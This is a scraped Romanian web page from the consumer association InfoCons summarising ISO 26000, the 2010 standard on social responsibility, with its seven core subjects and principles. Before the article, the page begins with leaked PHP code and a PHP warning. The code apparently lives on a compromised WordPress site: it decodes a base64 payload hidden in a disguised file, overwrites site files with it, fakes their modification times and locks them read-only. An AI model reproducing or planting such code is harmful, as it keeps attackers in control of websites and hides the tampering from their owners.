$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } }
Warning: filemtime(): stat failed for /home/shuffles/public_html/index.php in /home/shuffles/public_html/wp-load.php on line 120
InfoCons: ISO 26000 – Standardul pentru responsabilitate sociala si dezvoltare durabila – O noua atitudine

ISO 26000, standardul pentru responsabilitate sociala si dezvoltare durabila. Acest standard a fost  lansat pe 1 Noiembrie 2010, după cinci ani de negocieri între părţile interesate diferite din întreaga lume. Reprezentanţi ai guvernului, ONG-uri, industria, grupurile de consumatori şi organizaţiile de muncă din întreaga lume au fost implicaţi în dezvoltarea sa, ceea ce înseamnă că reprezintă un consens internaţional.

 

ISO 26000:2010 oferă mai degrabă ghidare decât norme, astfel încât nu poate fi certificat, spre deosebire de alţe standarde ISO. Acesta ajuta la clarificarea responsabilitatii sociale, ajută întreprinderile şi organizaţiile sa-si transforme principiile în acţiuni eficiente şi impartaseste cele mai bune practici referitoare la responsabilitatea socială, la nivel global. Acesta se adresează ltuturor tipurilor de organizatii, indiferent de activitatea, mărimea sau localizarea lor.

ISO 26000 identifica sapte subiecte centrale pe care organizatiile (institutii guvernamentale, companii, sindicate, asociatii de consumatori, ONG-uri, etc.) trebuie sa le abordeze in mod integrat.

Pentru fiecare dintre acestea standardul ofera informatii privind scopul, relatia cu responsabilitatea sociala, principii, considerente si actiuni corelate. Ele sunt:

–       guvernanta organizationala – incorporarea celor sapte principii ale responsabilitatii sociale in procesele decizionale si operationale.

–       drepturile omului – drepturi civile si politice, economice, culturale si sociale. O recomandare importanta este aceea ca organizatiile, prin activitatile lor, nu trebuie sa ingradeasca accesul la resurse esentiale (precum apa).

–        conditii de munca – recrutarea si promovarea responsabila a angajatilor, proceduri de rezolvare a plangerilor, transferul si relocarea angajatilor, formare, sanatate, securitate si igiena industriala, remuneratie, timp de lucru.

–        mediul – abordarea precautionala, evaluarea si managementul riscului de mediu, aplicarea principiului poluatorul plateste, luarea in considerare a ciclului de viata al produsului, productie curata si eco-eficienta, abordarea sistemului produs-serviciu, achizitii durabile, constientizare si sensibilizare a publicului.

–          practicile de afaceri – comportamentul etic al organizatiilor in relatii cu alte organizatii, cu scopul de  a genera output-uri responsabile.

–         problemele consumatorilor – Ghidul Natiunilor Unite pentru Protejarea Consumatorului

–         implicarea sociala – organizatiile trebuie sa fie un „bun cetatean” al comunitatii.

 

Principiile Responsabilitatii Sociale identificate de ISO 26000 sunt:

–         Responsibilitatea – organizatia trebuie sa „dea socoteala” pentru impactul asupra societatii, economiei si mediului.

–          Transparenta – pentru deciziile si activitatile care au un impact asupra societatii si a mediului.

–          Comportament etic – comportament organizational onest, echitabil si integru.

–          Respect pentru interesele stakeholderilor – identificarea relevantei pe care acestia o au pentru dezvoltarea durabila precum si o atentie speciala pentru cei care nu au posibilitatea de a se organiza sau de a fi ascultati.

–          Respectul legii.

–          Respectul normelor internationale de comportament – este vorba de pricipalele norme folosite in dreptul international.

–          Respectul drepturilor omului – identificarea si prevenirea oricaror abuzuri.

 

Asociaţia Naţională pentru Protecţia Consumatorilor şi Promovarea Programelor şi Strategiilor din România – A.N.P.C.P.P.S. România – o9atitudine ! – InfoCons, unica organizaţie din România cu drepturi depline în Consumers International,  membră fondatoare a Federaţiei Asociaţiilor de Consumatori.

 

Sursa: ISO, Societal

By o9admin